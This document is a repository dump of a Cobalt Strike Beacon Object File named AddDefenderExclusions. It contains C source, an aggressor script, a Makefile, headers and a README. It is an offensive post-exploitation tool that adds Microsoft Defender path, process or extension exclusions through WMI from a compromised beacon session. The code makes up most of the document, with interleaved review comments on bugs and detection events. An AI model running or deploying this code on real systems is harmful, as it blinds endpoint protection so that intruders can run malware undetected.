├── AddDefenderExclusions.c ├── AddDefenderExclusions.cna ├── AddDefenderExclusions.x64.o ├── AddDefenderExclusions.x86.o ├── Makefile.ADD ├── README.md └── headers ├── beacon.h └── win32.h
/AddDefenderExclusions.c:
--------------------------------------------------------------------------------
// NOTE(review): the three system-header names below were lost in extraction
// (angle-bracket includes stripped by the page renderer); they are left as found.
#include
#include
#include
#include "headers/beacon.h"
#include "headers/win32.h"
#pragma comment(lib, "wbemuuid.lib")

// Property names of the MSFT_MpPreference "Add" in-parameter instance that this
// BOF can populate. options[] below maps option 1/2/3 onto them in this order.
#define FOLDER_EXCLUSIONS L"ExclusionPath"
#define PROCESS_EXCLUSIONS L"ExclusionProcess"
#define EXTENSION_EXCLUSIONS L"ExclusionExtension"

/*
 * AddDefenderExclusions - adds a single exclusion entry to Microsoft Defender
 * through WMI: connects to ROOT\Microsoft\Windows\Defender, spawns the
 * in-parameter object of MSFT_MpPreference::Add, stores `value` in a
 * one-element BSTR SAFEARRAY under the selected property, and calls ExecMethod.
 *
 * option: 1 = ExclusionPath, 2 = ExclusionProcess, 3 = ExclusionExtension;
 *         used as options[option-1].
 * value:  wide string copied with SysAllocString into the SAFEARRAY.
 * Returns 1 on success, 0 on any failure; every failure is reported with
 * BeaconPrintf(CALLBACK_ERROR, ...) and COM state is torn down before return.
 *
 * Defender-side view: a successful call is a Defender configuration change,
 * which the Microsoft-Windows-Windows Defender/Operational log records
 * (event 5007, "configuration has changed"); with WMI activity tracing enabled
 * it is also visible as an ExecMethod of MSFT_MpPreference::Add from the calling
 * process. Where Tamper Protection covers exclusions, ExecMethod presumably fails
 * rather than succeeds - not verifiable from this file. The function does not
 * check BeaconIsAdmin() (declared in beacon.h); the required token level is
 * assumed, not verified.
 */
INT AddDefenderExclusions(int option, wchar_t* value)
{
    // Index `option-1` selects the property written below.
    const wchar_t* options[] = { FOLDER_EXCLUSIONS, PROCESS_EXCLUSIONS, EXTENSION_EXCLUSIONS };

    HRESULT hr;

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Get args: %d %ws", option, value);
    // NOTE(review): only the upper bound is rejected. option <= 0 passes this
    // check and options[option-1] is then an out-of-bounds read (undefined
    // behaviour); the .cna only checks the argument count, not the value.
    if(option>3)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] no option found: %d", option);
        return 0;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] CoInitialize...");
    hr = OLE32$CoInitializeEx(0, COINIT_MULTITHREADED);
    if (FAILED(hr))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] CoInitializeEx has failed: %08x", hr);
        return 0;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] CoInitializeSecurity...");
    // Process-wide COM security: default authentication level, impersonate-level
    // impersonation, no explicit security descriptor or authentication list.
    hr = OLE32$CoInitializeSecurity(
        NULL,
        -1,
        NULL,
        NULL,
        RPC_C_AUTHN_LEVEL_DEFAULT,
        RPC_C_IMP_LEVEL_IMPERSONATE,
        NULL,
        EOAC_NONE,
        NULL
    );
    if (FAILED(hr))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] CoInitializeSecurity has failed: %08x\n", hr);
        OLE32$CoUninitialize();
        return 0;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] CoCreateInstance CLSID_WbemLocator...");
    IWbemLocator* pLoc = 0;
    // CLSID/IID come from the static GUIDs in headers/win32.h.
    hr = OLE32$CoCreateInstance(g_CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, g_IID_IWbemLocator, (LPVOID*)&pLoc);
    if (FAILED(hr))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] CoCreateInstance has failed: %08x", hr);
        OLE32$CoUninitialize();
        return 0;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] ConnectServer...");
    IWbemServices* pSvc = 0;
    // Local connection (no user/password/locale) to the Defender WMI namespace.
    hr = pLoc->ConnectServer(L"ROOT\\Microsoft\\Windows\\Defender", NULL, NULL, 0, NULL, 0, 0, &pSvc);
    if (FAILED(hr))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] ConnectServer has failed: %08x", hr);
        pLoc->Release();
        OLE32$CoUninitialize();
        return 0;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] CoSetProxyBlanket...");
    // Per-proxy security on the IWbemServices proxy: NTLM/Negotiate-style
    // authentication, per-call authentication level, impersonate level.
    hr = OLE32$CoSetProxyBlanket(
        pSvc,
        RPC_C_AUTHN_WINNT,
        RPC_C_AUTHZ_NONE,
        NULL,
        RPC_C_AUTHN_LEVEL_CALL,
        RPC_C_IMP_LEVEL_IMPERSONATE,
        NULL,
        EOAC_NONE
    );
    if (FAILED(hr))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] CoSetProxyBlanket has failed: %08x", hr);
        pSvc->Release();
        pLoc->Release();
        OLE32$CoUninitialize();
        return 0;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] GetObject...");
    IWbemClassObject* pClass = 0;
    // NOTE(review): a wide string literal assigned directly to a BSTR; it is not
    // allocated with SysAllocString and so carries no BSTR length prefix. The same
    // applies to MethodName below. Latent correctness issue rather than a crash here.
    BSTR Clname = L"MSFT_MpPreference";
    hr = pSvc->GetObject(Clname, 0, NULL, &pClass, NULL);
    // NOTE(review): hr is not checked after GetObject. If it failed, pClass is
    // still NULL and the GetMethod call below dereferences it.

    BeaconPrintf(CALLBACK_OUTPUT, "[+] GetMethod...");
    BSTR MethodName = L"Add";
    IWbemClassObject* pInSignature = 0;
    // Fetch the in-parameter class definition of MSFT_MpPreference::Add.
    hr = pClass->GetMethod(MethodName, 0, &pInSignature, NULL);
    if (FAILED(hr))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] GetMethod has failed: %08x", hr);
        // NOTE(review): on this path pInSignature is still the initial 0, so
        // Release() below is a NULL dereference.
        pInSignature->Release();
        pClass->Release();
        pSvc->Release();
        pLoc->Release();
        OLE32$CoUninitialize();
        return 0;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] SpawnInstance...");
    IWbemClassObject* pClassInstance = NULL;
    // Create the concrete in-parameter instance that will be passed to ExecMethod.
    hr = pInSignature->SpawnInstance(0, &pClassInstance);
    if (FAILED(hr))
    {
        BeaconPrintf(CALLBACK_ERROR, "SpawnInstance has failed: %08x", hr);
        // NOTE(review): same pattern as the GetMethod error path - pClassInstance
        // is still NULL here, so this Release() dereferences NULL.
        pClassInstance->Release();
        pInSignature->Release();
        pClass->Release();
        pSvc->Release();
        pLoc->Release();
        OLE32$CoUninitialize();
        return 0;
    }

    // Create an array: one-dimensional, one BSTR element, lower bound 0.
    SAFEARRAYBOUND rgsaBounds[1];
    rgsaBounds[0].cElements = 1;
    rgsaBounds[0].lLbound = 0;
    SAFEARRAY* psaStrings;
    // NOTE(review): the SafeArrayCreate result is not checked; a NULL here is
    // passed straight into SafeArrayPutElement.
    psaStrings = OLEAUT32$SafeArrayCreate(VT_BSTR, 1, rgsaBounds);

    // Add a string to the array. SafeArrayPutElement copies the BSTR, which is
    // why the temporary variant can be cleared immediately afterwards.
    VARIANT vString;
    OLEAUT32$VariantInit(&vString);
    V_VT(&vString) = VT_BSTR;
    V_BSTR(&vString) = OLEAUT32$SysAllocString(value);
    LONG lArrayIndex = 0;
    OLEAUT32$SafeArrayPutElement(psaStrings, &lArrayIndex, V_BSTR(&vString));
    OLEAUT32$VariantClear(&vString);
    // variant array: vStringList takes ownership of psaStrings, so the later
    // VariantClear(&vStringList) calls also release the SAFEARRAY.
    VARIANT vStringList;
    OLEAUT32$VariantInit(&vStringList);
    V_VT(&vStringList) = VT_ARRAY | VT_BSTR;
    V_ARRAY(&vStringList) = psaStrings;

    //BeaconPrintf(CALLBACK_OUTPUT, "[+] Put Exclusion...");
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Put %ws...",options[option-1]);

    // Store the string array under the selected property (string[] CIM type).
    hr = pClassInstance->Put(options[option-1], 0, &vStringList, CIM_STRING | CIM_FLAG_ARRAY);
    if (FAILED(hr))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Put has failed: %08x", hr);
        OLEAUT32$VariantClear(&vStringList);
        pClassInstance->Release();
        pInSignature->Release();
        pClass->Release();
        pSvc->Release();
        pLoc->Release();
        OLE32$CoUninitialize();
        return 0;
    }

    // NOTE(review): pOutParams is declared but never passed to ExecMethod (the
    // out-parameter argument below is NULL), so the method's ReturnValue is
    // never inspected - "Success" only means the call was dispatched.
    IWbemClassObject* pOutParams = NULL;
    BeaconPrintf(CALLBACK_OUTPUT, "[+] ExecMethod...");
    hr = pSvc->ExecMethod(Clname, MethodName, 0, NULL, pClassInstance, NULL, NULL);
    if (FAILED(hr))
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] ExecMethod has failed: %08x", hr);
        OLEAUT32$VariantClear(&vStringList);
        pClassInstance->Release();
        pInSignature->Release();
        pClass->Release();
        pSvc->Release();
        pLoc->Release();
        OLE32$CoUninitialize();
        return 0;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Success!");

    // Teardown in the same order as the error paths (pLoc/pSvc order differs
    // from the error paths; harmless since the two objects are independent).
    OLEAUT32$VariantClear(&vStringList);
    pClassInstance->Release();
    pInSignature->Release();
    pClass->Release();
    pLoc->Release();
    pSvc->Release();
    OLE32$CoUninitialize();

    return 1;
}

/*
 * go - BOF entry point. The .cna packs the arguments as "iZ": an int option
 * followed by a wide string. Unpacks them and forwards to AddDefenderExclusions,
 * reporting the 0/1 result. No validation happens here; the option range check
 * (upper bound only) lives in AddDefenderExclusions. Presumably
 * BeaconDataExtract can yield NULL when no string is present - not shown by
 * beacon.h; confirm before relying on `value` being non-NULL.
 */
extern "C" void go(char* buff, int len)
{
    datap dpParser;
    wchar_t* value;

    BeaconDataParse(&dpParser, buff, len);

    int iEnumerationOption = BeaconDataInt(&dpParser);
    value = (wchar_t*)BeaconDataExtract(&dpParser, NULL);
    int res = AddDefenderExclusions(iEnumerationOption,value);
    if (!res)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] AddDefenderExclussion has failed");
    }
    else {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] AddDefenderExclussion has Success!");
    }


    return;
}
--------------------------------------------------------------------------------
/AddDefenderExclusions.cna:
--------------------------------------------------------------------------------
alias AddDefenderExclusions {
    local('$barch $handle $data $args');

    # Only the argument count is validated here; $2 (the option) is not
    # range-checked in this script, and the BOF rejects only values above 3.
    if(size(@_) != 3)
    {
        berror($1, "Incorrect usage!");
        berror($1, beacon_command_detail("AddDefenderExclusions"));
        return;
    }

    # figure out the arch of this session
    $barch = barch($1);

    # read in the right BOF file
    println(script_resource("AddDefenderExclusions. $+ $barch $+ .o"));
    $handle = openf(script_resource("AddDefenderExclusions. $+ $barch $+ .o"));
    $data = readb($handle, -1);
    closef($handle);

    # pack our arguments: int option, then wide string value (matches go()).
    $args = bof_pack($1, "iZ", $2,$3);

    # announce what we're doing
    btask($1, "Running AddDefenderExclusions BOF");

    # execute it.
27 | beacon_inline_execute($1, $data, "go", $args); 28 | } 29 | 30 | beacon_command_register( 31 | "AddDefenderExclusions", 32 | "Add Defender Exclusions via com object", 33 | "Synopsis: AddDefenderExclusions 1 C:\\ 34 | You must supply an argument between 1 and 3.\n 35 | 1: Folder exclusions\n 36 | 2: Process exclusions\n 37 | 3: Extension exclusions."); -------------------------------------------------------------------------------- /AddDefenderExclusions.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Like0x/AddDefenderExclusions-BOF/83fba4a2356ffa9cf686aef7dce472a9056c15ff/AddDefenderExclusions.x64.o -------------------------------------------------------------------------------- /AddDefenderExclusions.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Like0x/AddDefenderExclusions-BOF/83fba4a2356ffa9cf686aef7dce472a9056c15ff/AddDefenderExclusions.x86.o -------------------------------------------------------------------------------- /Makefile.ADD: -------------------------------------------------------------------------------- 1 | BOFNAME := AddDefenderExclusions 2 | 3 | CC_x64 := x86_64-w64-mingw32-g++ 4 | CC_x86 := i686-w64-mingw32-g++ 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | STRIP_x64 := x86_64-w64-mingw32-strip 7 | 8 | all: 9 | $(CC_x64) -Wno-write-strings -o $(BOFNAME).x64.o -c $(BOFNAME).c -masm=intel 10 | $(STRIP_x64) --strip-unneeded $(BOFNAME).x64.o 11 | 12 | $(CC_x86) -Wno-write-strings -o $(BOFNAME).x86.o -c $(BOFNAME).c -masm=intel 13 | $(STRIP_x86) --strip-unneeded $(BOFNAME).x86.o 14 | 15 | clean: 16 | rm -f ../dist/$(BOFNAME).x64.o 17 | rm -f ../dist/$(BOFNAME).x86.o -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AddDefenderExclusions-BOF 2 | AddDefenderExclusions Beacon 
Object File 3 | 4 | ``` 5 | make -f Makefile.ADD 6 | ``` 7 | load cna 8 | 9 | ``` 10 | AddDefenderExclusions 1 C:\ 11 | ``` 12 | You must supply an argument between 1 and 3. 13 | 14 | 1: Folder exclusions 15 | 16 | 2: Process exclusions 17 | 18 | 3: Extension exclusions. 19 | 20 | ![image](https://github.com/Like0x/AddDefenderExclusions-BOF/assets/19629138/9624c6c8-32b7-4606-8f9e-3a621b5eb9b9) 21 | 22 | ## References 23 | https://cloud.tencent.com/developer/article/1900214 24 | 25 | https://github.com/EspressoCake/Defender_Exclusions-BOF 26 | -------------------------------------------------------------------------------- /headers/beacon.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | extern "C" { 3 | #include 4 | 5 | typedef struct { 6 | char * original; /* the original buffer [so we can free it] */ 7 | char * buffer; /* current pointer into our buffer */ 8 | int length; /* remaining length of data */ 9 | int size; /* total size of this buffer */ 10 | } datap; 11 | 12 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 13 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 14 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 15 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 16 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 17 | 18 | /* format API */ 19 | typedef struct { 20 | char * original; /* the original buffer [so we can free it] */ 21 | char * buffer; /* current pointer into our buffer */ 22 | int length; /* remaining length of data */ 23 | int size; /* total size of this buffer */ 24 | } formatp; 25 | 26 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 27 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 28 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 29 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 30 | DECLSPEC_IMPORT void 
BeaconFormatPrintf(formatp * format, char * fmt, ...); 31 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 32 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 33 | 34 | /* Output Functions */ 35 | #define CALLBACK_OUTPUT 0x0 36 | #define CALLBACK_OUTPUT_OEM 0x1e 37 | #define CALLBACK_ERROR 0x0d 38 | #define CALLBACK_OUTPUT_UTF8 0x20 39 | 40 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 41 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 42 | 43 | /* Token Functions */ 44 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 45 | DECLSPEC_IMPORT void BeaconRevertToken(); 46 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 47 | 48 | /* Spawn+Inject Functions */ 49 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 50 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 51 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 52 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 53 | 54 | /* Utility Functions */ 55 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 56 | } -------------------------------------------------------------------------------- /headers/win32.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | 8 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv); 9 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx (LPVOID pvReserved, DWORD dwCoInit); 10 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoSetProxyBlanket(IUnknown* pProxy, DWORD dwAuthnSvc, DWORD dwAuthzSvc, OLECHAR* pServerPrincName, DWORD dwAuthnLevel, DWORD 
dwImpLevel, RPC_AUTH_IDENTITY_HANDLE pAuthInfo, DWORD dwCapabilities); 11 | extern "C" DECLSPEC_IMPORT void WINAPI OLE32$CoUninitialize (void); 12 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity (PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE *asAuthSvc, void *pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void *pAuthList, DWORD dwCapabilities, void *pReserved3); 13 | extern "C" DECLSPEC_IMPORT BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *); 14 | extern "C" DECLSPEC_IMPORT void WINAPI OLEAUT32$SysFreeString(BSTR); 15 | extern "C" DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SysStringLen(BSTR); 16 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$VariantChangeType(VARIANTARG *pvargDest,VARIANTARG *pvarSrc,USHORT wFlags,VARTYPE vt); 17 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$VariantClear(VARIANTARG *pvarg); 18 | extern "C" DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantInit(VARIANTARG *pvarg); 19 | extern "C" DECLSPEC_IMPORT int WINAPI SHLWAPI$StrCmpW (PCWSTR psz1, PCWSTR psz2); 20 | extern "C" DECLSPEC_IMPORT PCWSTR WINAPI SHLWAPI$StrStrW (PCWSTR pszFirst, PCWSTR pszSrch); 21 | extern "C" DECLSPEC_IMPORT void WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY *psa); 22 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayLock(SAFEARRAY *psa); 23 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetLBound(SAFEARRAY *psa, UINT nDim, LONG *plLbound); 24 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetUBound(SAFEARRAY *psa, UINT nDim, LONG *plUbound); 25 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetElement(SAFEARRAY *psa, LONG *rgIndices, void *pv); 26 | extern "C" DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SafeArrayGetElemsize(SAFEARRAY *psa); 27 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY *psa,void HUGEP **ppvData); 28 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY *psa); 29 | extern 
"C" DECLSPEC_IMPORT SAFEARRAY * __stdcall WINAPI OLEAUT32$SafeArrayCreate(VARTYPE vt, UINT cDims, SAFEARRAYBOUND *rgsabound); 30 | extern "C" DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayPutElement(SAFEARRAY *psa, LONG *rgIndices, void * pv); 31 | 32 | extern "C" { 33 | static GUID g_CLSID_WbemLocator = { 0x4590f811, 0x1d3a, 0x11d0, { 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24 } }; 34 | static GUID g_IID_IWbemLocator = { 0xdc12a687, 0x737f, 0x11cf, { 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24 } }; 35 | } --------------------------------------------------------------------------------